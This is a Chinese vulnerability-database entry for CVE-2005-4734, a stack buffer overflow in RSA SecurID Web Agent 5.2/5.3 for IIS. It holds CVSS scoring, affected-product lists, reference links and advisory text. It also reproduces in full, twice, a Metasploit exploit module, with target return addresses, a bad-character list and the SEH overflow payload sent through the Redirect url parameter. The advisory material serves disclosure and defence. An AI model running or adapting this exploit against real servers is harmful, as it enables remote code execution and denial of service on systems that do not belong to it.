CVE-2005-4734
CVSS6.4
发布时间 :2005-12-31 00:00:00
修订时间 :2008-09-05 16:57:40
NMCOEPS    

[原文]Stack-based buffer overflow in IISWebAgentIF.dll in RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 for IIS allows remote attackers to execute arbitrary code via a long url parameter in the Redirect method.


[CNNVD]RSA Authentication Agent IISWebAgentIF.DLL远程栈缓冲区溢出漏洞(CNNVD-200512-940)

        RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 和5.3 IIS版本的ISSWebAgentIF.dll存在基于栈的缓冲区溢出,远程攻击者可以通过在Redirect方法中的长url参数来执行任意代码。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:rsa:authentication_agent_for_web:5.2RSA RSA Authentication Agent for Web 5.2
cpe:/a:rsa:authentication_agent_for_web:5.3RSA RSA Authentication Agent for Web 5.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4734
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-940
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/20151
(UNKNOWN)  OSVDB  20151
http://www.metasploit.com/projects/Framework/exploits.html#rsa_iiswebagent_redirect
(UNKNOWN)  MISC  http://www.metasploit.com/projects/Framework/exploits.html#rsa_iiswebagent_redirect
http://secunia.com/advisories/17281
(VENDOR_ADVISORY)  SECUNIA  17281
http://www.securityfocus.com/bid/26424
(UNKNOWN)  BID  26424

- 漏洞信息

RSA Authentication Agent IISWebAgentIF.DLL远程栈缓冲区溢出漏洞
中危 缓冲区溢出
2005-12-31 00:00:00 2006-03-20 00:00:00
远程  
        RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 和5.3 IIS版本的ISSWebAgentIF.dll存在基于栈的缓冲区溢出,远程攻击者可以通过在Redirect方法中的长url参数来执行任意代码。

- 公告与补丁

        

- 漏洞信息 (16358)

Microsoft IIS ISAPI RSA WebAgent Redirect Overflow (EDBID:16358)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: rsa_webagent_redirect.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the SecurID Web
				Agent for IIS. This ISAPI filter runs in-process with
				inetinfo.exe, any attempt to exploit this flaw will result
				in the termination and potential restart of the IIS service.

			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-4734'],
					['OSVDB', '20151'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f" +
						(0x3a..0x3f).to_a.pack('C*') + "\x40\x5c" + "Zz",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Version-specific return addresses
					['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],
					['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],

					# Generic return addresses
					['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],
					['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],

					['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],
					['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],

					['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],
					['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],

					['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],
					['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 21 2005'))

		register_options(
			[
				OptString.new('URL', [ true,  "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]),
			], self.class)
	end

	def check
		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'GetPic?image=msf'
		}, -1)

		if (r and r.body and r.body =~ /RSA Web Access Authentication/)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
		seh = generate_seh_payload(target['Rets'][1])
		pat[target['Rets'][0]-4, seh.length] = seh

		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'Redirect?url=' + pat
		}, 5)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83040)

Microsoft IIS ISAPI RSA WebAgent Redirect Overflow (PacketStormID:F83040)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,web,overflow
CVE-2005-4734
[点击下载]

This Metasploit module exploits a stack overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the SecurID Web
				Agent for IIS. This ISAPI filter runs in-process with
				inetinfo.exe, any attempt to exploit this flaw will result
				in the termination and potential restart of the IIS service.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-4734'],
					['OSVDB', '20151'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f\x3a\x3b\x3c" +
					              "\x3d\x3e\x3f\x40\x5c" + "Zz",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
	  				# Version-specific return addresses
					['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],
					['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],

					# Generic return addresses
					['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],
					['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],

					['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],
					['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],

					['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],
					['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],

					['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],
					['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('URL', [ true,  "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]),
				], self.class)
	end
	
	def check
		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'GetPic?image=msf'
		}, -1)
			
		if (r and r.body and r.body =~ /RSA Web Access Authentication/) 
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit

		pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
		seh = generate_seh_payload(target['Rets'][1])
		pat[target['Rets'][0]-4, seh.length] = seh
		
		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'Redirect?url=' + pat
		}, 5)
		
		handler
		disconnect
	end

end    

- 漏洞信息

20151
RSA Authentication Agent for Web IISWebAgentIF.dll Redirect Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in RSA Authentication Agent for Web for IIS. IISWebAgentIF.dll fails to validate the length of the "url" parameter in the "Redirect" method, resulting in a stack-based buffer overflow. With a specially crafted GET request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-10-21 Unknow
2005-10-21 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, RSA Security has reportedly released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

RSA Authentication Agent IISWebAgentIF.DLL Remote Stack Based Buffer Overflow Vulnerability
Boundary Condition Error 26424
Yes No
2005-10-21 12:00:00 2007-11-14 05:04:00
H.D Moore is credited with the discovery of this vulnerability.

- 受影响的程序版本

RSA Security Authentication Agent 5.3
RSA Security Authentication Agent 5.2

- 漏洞讨论

RSA Authentication Agent is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue on an affected computer to execute code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

RSA WebAgent 5.2 and 5.3 for Web for Microsoft IIS are vulnerable; other versions may also be affected.

- 漏洞利用

The following exploit code is available:

- 解决方案

The vendor released an update to address this issue. Please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站